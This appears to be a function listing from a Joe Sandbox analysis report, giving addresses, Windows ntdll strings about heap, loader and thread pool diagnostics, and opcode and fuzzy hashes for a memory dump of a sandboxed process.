                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: 04a1269e4fdb62beca2a9fdf90c6e297b425fb73fc7030e7228c4d4e270ac290
                                          • Instruction ID: b34d2a06a7a9b5de2c6b0e3725f52259aa34841f260af124fc5cbdec89aadd4e
                                          • Opcode Fuzzy Hash: 04a1269e4fdb62beca2a9fdf90c6e297b425fb73fc7030e7228c4d4e270ac290
                                          • Instruction Fuzzy Hash: A6E1AD31709741EFD715CF28C884F2ABBE0AB98314F104A6DE5AA8B3D2D775D945CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246ED7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1975516107
                                          • Opcode ID: d95887fdb38d76d8e3133f80909dd9c4b9ee19bffe5f7db0fc8909175119e67b
                                          • Instruction ID: 2c13c5fbda914a2845025a0ee22b376d7ff31e57e587537ee50836ae4c8368ba
                                          • Opcode Fuzzy Hash: d95887fdb38d76d8e3133f80909dd9c4b9ee19bffe5f7db0fc8909175119e67b
                                          • Instruction Fuzzy Hash: 7D51CC71B01246DFDB08CFA4C984FEEBBF1FB58318F204159D9296B285D774A982CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 247711A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: This is located in the %s field of the heap header.$ -k$`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 0-297660498
                                          • Opcode ID: c1cc8e6b7754c8decad1804303594f147c53dab50e6dd4eceaf756ccac274108
                                          • Instruction ID: a0a852e340618bae757e02258b125c4b8d5c9382c9753f589b3a344caf3b4ea9
                                          • Opcode Fuzzy Hash: c1cc8e6b7754c8decad1804303594f147c53dab50e6dd4eceaf756ccac274108
                                          • Instruction Fuzzy Hash: 1531F032200110EFEB02DB99CA88F9677F8EF05A60F604455F660EB399D774ED44CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246B76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                          • API String ID: 0-3061284088
                                          • Opcode ID: 2050ce216882d596a345e5d1ea6801d552fd1652bed3dea0b12c4a5b27ff0973
                                          • Instruction ID: c6e860cada5261929593fba63fbfe255ffbce286711bd41ca80fc1124c89afd8
                                          • Opcode Fuzzy Hash: 2050ce216882d596a345e5d1ea6801d552fd1652bed3dea0b12c4a5b27ff0973
                                          • Instruction Fuzzy Hash: 53014733114581DFF319E72AD45CFA27BD8DB43B30F244499F0645BA66CBE89880C624
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246D70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: e09764333a7a6c8e00fd8fae03d35b2add56ac595997b15d6ad3cd1c685cd141
                                          • Instruction ID: 4daf0f99f567dea24e68cc2f92db54313f1c4a5443e0fc13ca6a46041c72a551
                                          • Opcode Fuzzy Hash: e09764333a7a6c8e00fd8fae03d35b2add56ac595997b15d6ad3cd1c685cd141
                                          • Instruction Fuzzy Hash: AA13ED72A00655CFDB15CF68C884BADBBF1FF68700F1481AAD859AB386D734A941CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246D1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-3570731704
                                          • Opcode ID: e877d9d193a0bca3d79769d9181236428c416e561de6613107fdf061e5b6e4aa
                                          • Instruction ID: 0926bbb7d926fe1a0b2ec105d433cf8ac80bbc1abb93d05264f0118a096836b7
                                          • Opcode Fuzzy Hash: e877d9d193a0bca3d79769d9181236428c416e561de6613107fdf061e5b6e4aa
                                          • Instruction Fuzzy Hash: C8924772A01629CFEB26CF18C854F99B7B5BF48310F0582EAE959A7391D7709E80CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246CB6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\Ui$
                                          • API String ID: 0-1567251685
                                          • Opcode ID: 9638d58b40ba311c863a5f15a9e71719d95b9914e3bbe0a13ce20d2b7bb41eba
                                          • Instruction ID: 1fca9c1f426fac5918a407e17c3d0a371401b8cdfdf633ec07a9cf653e3d3b46
                                          • Opcode Fuzzy Hash: 9638d58b40ba311c863a5f15a9e71719d95b9914e3bbe0a13ce20d2b7bb41eba
                                          • Instruction Fuzzy Hash: 50B1CD31A04A068FDB16CF69D884F9DBBB6FF54B00F144929E961EB385D370E840CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 246F8591
                                          • LdrpInitializeProcess, xrefs: 246F8422
                                          • minkernel\ntdll\ldrinit.c, xrefs: 246F8421
                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 246F855E
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1918872054
                                          • Opcode ID: 74e182e01df95543cb01053dba5d785f6821bec6fe6f13ecf76716752bd86fd4
                                          • Instruction ID: 7d86e2565fb4dca1f69707a1b4c4bda3b1726abab6ed8e704cfbfd060b6d9ae9
                                          • Opcode Fuzzy Hash: 74e182e01df95543cb01053dba5d785f6821bec6fe6f13ecf76716752bd86fd4
                                          • Instruction Fuzzy Hash: 0C91AE72508344AFE721DF21CC84EABBBE8EF94344F50496EFA9596241E334DD44CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: %s() passed the empty activation context, xrefs: 247321DE
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 247321D9, 247322B1
                                          • .Local, xrefs: 246F28D8
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 247322B6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: 1f7b854cece787fc108859f07cf9ab3af1fcf0a4cdddcd1d8e3537121b4c38bb
                                          • Instruction ID: 4d3e5dc1c46c9491ba4191153da09fd129a69d50fd6c3493621d68023629dc7f
                                          • Opcode Fuzzy Hash: 1f7b854cece787fc108859f07cf9ab3af1fcf0a4cdddcd1d8e3537121b4c38bb
                                          • Instruction Fuzzy Hash: 57A1DE31A01229DBDB20CF65DC84B99B7B1BF68314F2201E9D999AB752D7319E80CFD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246CB440 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\Ui$${
                                          • API String ID: 0-1596591701
                                          • Opcode ID: d8ab7d030bea3bb64a4c4faccc22ab528b969d8b806ca41727e5329126981c5c
                                          • Instruction ID: 4c79537cdbcfbb7d7f13840637f75a4b7aba3eabfe9360d56a526dd26c8deed8
                                          • Opcode Fuzzy Hash: d8ab7d030bea3bb64a4c4faccc22ab528b969d8b806ca41727e5329126981c5c
                                          • Instruction Fuzzy Hash: 2891CD71E0475ACFDB11CF65E484BAE7BB4EF10B54F148195E920AB390D3B89E80CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                          Download Yara Rule
                                          Strings
                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2472106B
                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 247210AE
                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 24720FE5
                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 24721028
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                          • API String ID: 0-1468400865
                                          • Opcode ID: 6288ea07073e41c174752b95828025d0f1f90584828bcd851ef97baf02eceb40
                                          • Instruction ID: 815771fe12fef595be89df28ad29a7b4c8542627df329aa6455d5a8c465a1d1d
                                          • Opcode Fuzzy Hash: 6288ea07073e41c174752b95828025d0f1f90584828bcd851ef97baf02eceb40
                                          • Instruction Fuzzy Hash: 4A71DFB19043449FD711CF14C888F8B7BA8EFA4B64F504868F9588B24AD334DA88CFD6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246BF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 0-2586055223
                                          • Opcode ID: 2e246e8f95f3b8da9e4066c0ebfe4cd858788e393b01edfceafe55c194eac511
                                          • Instruction ID: 794330d421834ba0fbac76c2765d9bdde8bfd53b73865f51895790d001b400ac
                                          • Opcode Fuzzy Hash: 2e246e8f95f3b8da9e4066c0ebfe4cd858788e393b01edfceafe55c194eac511
                                          • Instruction Fuzzy Hash: BB61F4323056409FE312CB24C944F5B7BE8EF84754F040469FAAADB3A2D774D941CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                          Download Yara Rule
                                          Strings
                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2472A992
                                          • LdrpDynamicShimModule, xrefs: 2472A998
                                          • minkernel\ntdll\ldrinit.c, xrefs: 2472A9A2
                                          • TGi$, xrefs: 246E2462
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGi$$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2230103857
                                          • Opcode ID: c4b110b416b4530610992a425b86ac02917edddbcfdd186a89620e1b100a5a12
                                          • Instruction ID: 1278f52f142b4c68604d316a3c43f6a460a79a6a4400b1107dcd6e1531b2ae7e
                                          • Opcode Fuzzy Hash: c4b110b416b4530610992a425b86ac02917edddbcfdd186a89620e1b100a5a12
                                          • Instruction Fuzzy Hash: 71313772A00711EBE729DF9AC884EAA7BB5FF94B00F110069F9747B345D7B45981CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246B9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                          • API String ID: 0-1391187441
                                          • Opcode ID: 9f49a2a7312163526008f9d1e9730d8060cb37e646a6dd3c5e3142ba7b6c8f4c
                                          • Instruction ID: a4bc5763ff649184083981a545414477f2ade805dfeea490a4a9175bbd063574
                                          • Opcode Fuzzy Hash: 9f49a2a7312163526008f9d1e9730d8060cb37e646a6dd3c5e3142ba7b6c8f4c
                                          • Instruction Fuzzy Hash: 2431CF32600105EFD711DB5AC888F9ABBF8EF45B60F1440A6E964BB391D770ED44CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24701270 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$BuildLabEx$Eo$$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                          • API String ID: 0-3340964777
                                          • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                          • Instruction ID: a0938c0d4717199097d3e04a96f4db46a4c18e5af32113117a66ecf6756a0ff2
                                          • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                          • Instruction Fuzzy Hash: 7A31AFB2A01518AFDB12DFA5CC44F9EBFF9EB94710F008025E924A7260E7319E059B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 247694E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $ $0
                                          • API String ID: 0-3352262554
                                          • Opcode ID: 3bae0f8dca074e82e5eb50eed72ad4fa2ca248aa6ec22eb601047971b7c6418d
                                          • Instruction ID: 21064f58ef3cab7f8df4031445ad5593590fb48c535a126a8f3690aef35e6614
                                          • Opcode Fuzzy Hash: 3bae0f8dca074e82e5eb50eed72ad4fa2ca248aa6ec22eb601047971b7c6418d
                                          • Instruction Fuzzy Hash: E53203B16083818FD315CF69C484B9BFBE6BB88344F04492EF9AA87351D775E948CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: 30651166561991dd6f2a4eff04b9b225d5d837e2271033bc6c396fba20f850e6
                                          • Instruction ID: 8fca59dee2354b2ca18bebc02b48773afcc6cdc67385608395e14d3c1d0906ea
                                          • Opcode Fuzzy Hash: 30651166561991dd6f2a4eff04b9b225d5d837e2271033bc6c396fba20f850e6
                                          • Instruction Fuzzy Hash: 46F17771B00A05EFEB15CF68C994F6AB7F5FB44708F1481A8E5259B386D734AA81CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246C1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                          Download Yara Rule
                                          Strings
                                          • HEAP[%wZ]: , xrefs: 246C1712
                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 246C1728
                                          • HEAP: , xrefs: 246C1596
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 765383cd122afe6780cc88577e7b45e3ed5c81300ab011aad12e67af742e420d
                                          • Instruction ID: 37311988c489fa39cb8871890e6c137bc4dc9a0b5e2262658a8555ffb8e191fa
                                          • Opcode Fuzzy Hash: 765383cd122afe6780cc88577e7b45e3ed5c81300ab011aad12e67af742e420d
                                          • Instruction Fuzzy Hash: 28E1F070A042459FD71ACF29C498BBABBF5EF68300F14849DE9A6CB346D734E940CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2474368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                          • API String ID: 0-2391371766
                                          • Opcode ID: dbcf939201cccd0e8e7dc6fe8e0a7f0f1d794757980bc3e8a7f79e3645b12030
                                          • Instruction ID: ce9166a035ce81e6e8ab6e289d0cf24d237729ada8cfd458a4d00374bf2323ba
                                          • Opcode Fuzzy Hash: dbcf939201cccd0e8e7dc6fe8e0a7f0f1d794757980bc3e8a7f79e3645b12030
                                          • Instruction Fuzzy Hash: D7B18C72B45341AFE311DF54D884F6BBBF8EB44714F014929FAA4AB390D7B4E8448B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: 5c43f04e10b3c93ae2842fcd29e029f1dc2215e875b727e715c65f0c134b8c71
                                          • Instruction ID: 925de91543e60c7b98e20ece4ffb3bc0a2a5693c22f3b13a4c0979097a8c3d29
                                          • Opcode Fuzzy Hash: 5c43f04e10b3c93ae2842fcd29e029f1dc2215e875b727e715c65f0c134b8c71
                                          • Instruction Fuzzy Hash: 71A17B729116299FDB21DF64CC88BEAB7B8EF48700F1041EAE91CA7250E7359E84DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 247536EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
